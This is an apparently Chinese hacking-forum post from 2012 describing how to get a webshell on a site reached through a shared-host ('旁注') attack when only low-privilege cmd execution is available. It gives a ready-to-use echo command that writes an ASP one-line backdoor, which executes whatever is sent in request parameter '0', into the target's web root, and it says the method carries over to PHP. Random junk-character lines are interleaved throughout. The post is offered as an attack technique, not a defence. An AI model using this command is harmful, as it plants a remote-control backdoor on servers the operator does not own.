中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 s* J R K! f0 P' J( ]5 b
+ v6 r. S" H1 R, Q6 W( e& a
命令格式
0 W1 \0 G" a1 ?6 o& j
9 F3 |8 i" c4 y: E+ {. f: d, B
Echo 语句 >目标站绝对目录
' {1 Y5 b0 q/ R4 X H+ D7 N7 O
& o z/ Z: G! @( {, j, p
例如:
& z5 {8 t9 ~6 [. Y
6 b$ z6 n* y5 M% T! y& |9 B! F& }
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
6 H& Q- W" H& c! g* W& s+ p! J, h
* F* Q7 R+ U6 j
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
8 W4 i/ F( g' g' u( s2 _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2